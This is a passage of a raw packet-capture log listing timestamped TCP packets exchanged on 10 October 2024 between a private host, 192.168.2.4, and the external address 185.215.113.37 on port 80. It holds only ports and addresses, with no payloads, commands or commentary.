Oct 10, 2024 18:23:18.817333937 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817348957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817378998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817466021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817478895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817495108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817507029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817512989 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817521095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817531109 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817557096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817601919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817612886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817631006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817631960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817643881 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817657948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817660093 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817672968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817682028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817684889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817702055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817712069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817714930 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817730904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817738056 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817744017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.817758083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.817774057 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818088055 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818099022 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818115950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818125963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818130016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818145037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818150997 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818157911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818173885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818178892 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818193913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818209887 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.818228006 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.818243980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840492010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840518951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840533018 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840538979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840559959 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840579033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840614080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840625048 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840643883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840646982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840657949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840663910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840679884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840696096 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840738058 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840749979 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840770960 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840797901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840814114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840825081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840842962 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840845108 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840861082 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840878010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.840933084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.840964079 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841025114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841041088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841054916 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841061115 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841072083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841078043 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841082096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841093063 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841114998 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841242075 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841253996 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841267109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841275930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841284990 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841294050 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841296911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841310978 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841336012 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841660023 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841681957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841692924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841706991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841758966 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841794968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841816902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841828108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841846943 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841864109 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841895103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841907978 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841927052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.841936111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841953993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.841998100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842029095 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.842111111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842122078 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842139959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842144966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.842150927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842169046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842178106 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.842190027 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.842209101 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.842231035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906477928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906488895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906505108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906528950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906544924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906548977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906563044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906575918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906586885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906595945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906603098 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906637907 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906785965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906796932 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906815052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906825066 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906826019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906841993 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906843901 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906857967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906861067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906873941 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.906892061 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906900883 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.906992912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907021046 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907049894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907061100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907080889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907084942 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907094955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907100916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907109976 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907125950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907160997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907196999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907243967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907257080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907269955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907274008 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907285929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907293081 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907300949 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907305956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907327890 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907475948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907489061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907505035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907505989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907519102 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907533884 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907536030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907550097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907562971 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907583952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907701969 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907713890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907732010 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907732010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907743931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907751083 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907763004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907769918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907778025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907782078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907794952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907795906 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907819033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907934904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.907944918 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907954931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907972097 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.907979965 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908011913 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908013105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908024073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908041000 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908045053 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908054113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908061028 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908070087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908076048 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908080101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908091068 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908108950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908442974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908452988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908469915 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908473969 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908483028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908490896 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908499002 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908508062 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908509970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908525944 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908538103 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908540964 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908555031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908560038 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908565044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908581972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908582926 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908598900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.908605099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.908628941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909001112 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909012079 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909029007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909034967 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909039021 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909055948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909061909 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909073114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909084082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909091949 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909101963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909107924 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909111977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909128904 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909132957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909142017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909157038 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909159899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909169912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909176111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909182072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909202099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909204006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909225941 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909248114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909456968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909487963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909544945 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909554958 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909560919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909578085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909585953 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909590960 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909603119 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.909610033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.909641981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941461086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941498041 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941507101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941510916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941525936 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941531897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941540956 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941545963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941560984 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941574097 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941615105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941626072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941642046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941646099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941663027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941678047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941689968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941718102 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941752911 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941764116 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941782951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941796064 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941869974 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941879988 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941899061 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941910982 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941919088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941920042 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941931963 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941941023 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941947937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.941957951 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.941982985 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942003012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942018032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942032099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942033052 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942045927 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942061901 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942089081 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942097902 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942120075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942138910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942148924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942161083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.942187071 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942203045 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.942986965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943027973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943037033 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943038940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943062067 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943078995 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943141937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943156004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943169117 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943177938 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943185091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943197966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943200111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943226099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943275928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943285942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943304062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943312883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943329096 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943348885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943348885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943368912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.943455935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.943492889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.999788046 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.999825001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.999835014 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.999839067 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:18.999850035 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.999871016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:18.999901056 CEST	80	49731	185.215.113.37	192.168.2.4
